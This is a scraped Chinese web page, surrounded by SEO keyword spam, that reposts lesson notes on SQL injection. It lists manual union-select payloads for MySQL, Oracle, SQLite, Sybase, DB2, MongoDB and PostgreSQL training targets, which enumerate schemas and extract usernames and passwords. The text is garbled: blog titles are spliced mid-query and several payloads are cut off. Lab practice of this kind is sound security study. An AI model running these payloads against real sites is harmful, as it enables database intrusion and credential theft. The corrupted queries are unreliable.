当前位置: 首页 > wzjs >正文

惠州热门的网站网站建设优化400报价

惠州热门的网站,网站建设优化400报价,定制开发小程序和模板小程序,美间在线设计平台#知识点:(本节课了解即可) 1、Web攻防-SQL注入-产生原理&应用因素 2、Web攻防-SQL注入-各类数据库类型利用 一、数据库知识: 1、数据库名,表名,列名,数据 2、自带数据库,数据库用户及权限 3…

#知识点:(本节课了解即可)

1、Web攻防-SQL注入-产生原理&应用因素

2、Web攻防-SQL注入-各类数据库类型利用

一、数据库知识:

1、数据库名,表名,列名,数据

2、自带数据库,数据库用户及权限

3、数据库敏感函数,默认端口及应用                         

4、数据库查询方法(增加删除修改更新)

二、SQL注入产生原理:

代码中执行的SQL语句存在可控变量导致

三、影响SQL注入的主要因素:

1、数据库类型(权限操作)

2、数据操作方法(增删改查)

3、参数数据类型(符号干扰)

4、参数数据格式(加密编码等)

5、提交数据方式(数据包部分)

6、有无数据处理(无回显逻辑等)->可以从“延时注入”的角度测试

四、常见SQL注入的利用过程:

1、判断数据库类型->不同的数据库类型,有不同的sql测试语句

2、判断参数类型及格式

3、判断数据格式及提交

4、判断数据回显及防护

5、获取数据库名,表名,列名

6、获取对应数据及尝试其他利用

五、黑盒/白盒如何发现SQL注入

1、盲对所有参数进行测试

2、整合功能点脑补进行测试

白盒参考后期代码审计课程

六、利用过程:

获取数据库名->表名->列名->数据(一般是关键数据,如管理员)

七、靶场实战:

Acunetix Web Vulnerability Scanner - Test websites

https://mozhe.cn/Special/SQL_Injection

①Access:已经基本淘汰 意义不大

②Mssql

http://vulnweb.com/

③Mysql

https://blog.csdn.net/weixin_57524749/article/details/140618103

id=-1 union select 1,database(),3,4

idSQL手工注入漏洞测试(Oracle数据库)——墨者学院-CSDN博客ation_schema.tables where table_schema='mozhe_Discuz_StormGroup'

id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'

id=-1 union select 1,2,group_concat(id,name,password),4 from StormGroup_member

④Oracle

https://blog.csdn.net/A2893992091/article/details/141365829

and 1=2 union select (select distinct owner from all_tables where rownum=1),'2' from dual

and 1=2 union select (select table_name from user_tables where rownum=1),'2' from dual

and 1=2 union select (select table_name from user_tables whe06#墨者靶场-SQL手工注入漏洞测试(SQLite数据库)-CSDN博客

1=2 union select (select column_name from all_tab_columns where rownum=1 and table_name='sns_users'),'2' from dual

and 1=2 union select (select column_name from all_tab_columns where rownum=1 and table_name='sns_users' and column_name not in ('USER_NAME')),'2' from dual

and 1=2 union select USER_NAME,USER_PWD from "sns_users"

and 1=2 union select USER_NAME,USER_PWD from "sns_users" where user_name not in ('hu')

⑤SQLite

06#墨者靶场-SQL手工注入漏洞测试(SQLite数据库)-CSDN博客

union select 1,name,sql,4 from sqlite_master limit 0,1

union select 1,name,password,4 from WSTMart_reg

⑥Sybase

id=-1 union all select null,db_name(),null,null

id=-1 union all select null,name,null,null from mozhe_Deepthroat.dbo.sysobjects

id=-1 union all select null,name,null,null from mozhe_Deepthroat..syscolumns where id=object_id('Deepthroat_login')

id=-1 union all select null,name,null,null from mozhe_Deepthroat..syscolumns where id=object_id('Deepthroat_login') and name<>'id'

id=-1 union all select null,name,null,SQL手工注入漏洞测试(MongoDB数据库)-CSDN博客

word,null,null from Deepthroat_loPostGREsql手工注入攻略_pgsql注入-CSDN博客

4274099

id=-1 union select 1,2,3,4 from syscat.tables

id=-1 union select 1,current schema,current server,4 from sysibm.sysdummy1

id=-1 union select 1,current schema,tabname,4 from syscat.tables where tabschema=current schema limit 0,1

id=-1 union select 1,colname,tabname,4 from syscat.columns where tabschema=current schema and tabname='GAME_CHARACTER' limit 1,1

id=-1 union select 1,colname,tabname,4 from syscat.columns where tabschema=current schema and tabname='GAME_CHARACTER' limit 2,1

id=-1 union select 1,NAME,PASSWORD,4 from GAME_CHARACTER limit 0,1

id=-1 union select 1,NAME,PASSWORD,4 from GAME_CHARACTER limit 1,1

⑦mongodb

SQL手工注入漏洞测试(MongoDB数据库)-CSDN博客

id=1'});return ({title:'1',content:'2

'});return ({content:tojson(db.getCollectionNames()),title:'1

'});return ({content:tojson(db.Authority_confidential.find()[0]),title:'

PostgreSQL

https://blog.csdn.net/2401_88387979/article/details/144275425

and 1=2 union select 'null',null,null,null

and 1=2 union select null,'null',null,null

and 1=2 union select null,null,string_agg(datname,','),null from pg_database

and 1=2 union select null,null,string_agg(tablename,','),null from pg_tables where schemaname='public'

and 1=2 union select null,null,string_agg(column_name,','),null from information_schema.columns where table_name='reg_users'

and 1=2 union select null,string_agg(name,','),string_agg(password,','),null from reg_users

http://www.dtcms.com/wzjs/34993.html

相关文章:

  • alexa全球网站排名分析品牌推广是做什么的
  • 怎样分析网站做seo在线刷关键词网站排名
  • 进空间的网站吗新网站快速收录
  • 加强政务网站建设谷歌seo服务公司
  • 郑州管城建设网站全球网络营销公司排名
  • 做网站有哪些网址信息查询
  • 中铁快运关于网站建设大数据免费查询平台
  • 做推广最好的网站是哪个?免费的网站域名查询app
  • logo网站有哪些企业查询系统
  • 网站域名和密码武汉网站seo推广公司
  • 医疗网站模板免费下载seo竞价推广
  • 软件网站开发培训聚合搜索引擎入口
  • 公司做网站排名靠前西安seo关键词排名
  • 花都微网站建设网站搜索引擎优化工具
  • 深圳网站官网建设方案百度网址大全
  • 何为门户网站爱站网官网
  • 网站开发的基础是什么seo关键词排名网络公司
  • 郑州网站制作网大二网络营销实训报告
  • 快速做网站的方法电商代运营一般收多少服务费
  • arcengine网站开发拉新十大推广app平台
  • jsp动态网站开发案...临沂百度公司地址
  • 建设银行网站查询信息流广告模板
  • wordpress 优酷免广告插件北京seo的排名优化
  • 电商网站操作手册做app的网站
  • python可以做复杂网站网站建设策划书范文
  • 中兴路由器做网站营销推广技巧
  • 哪里可以建设网站站长统计app软件下载
  • 网站建设与开发 期末作品淘宝热搜关键词排行榜
  • 2015百度推广网站遭到攻击ip或域名查询网
  • 17网站一起做网店增城信息流优化师需要具备哪些能力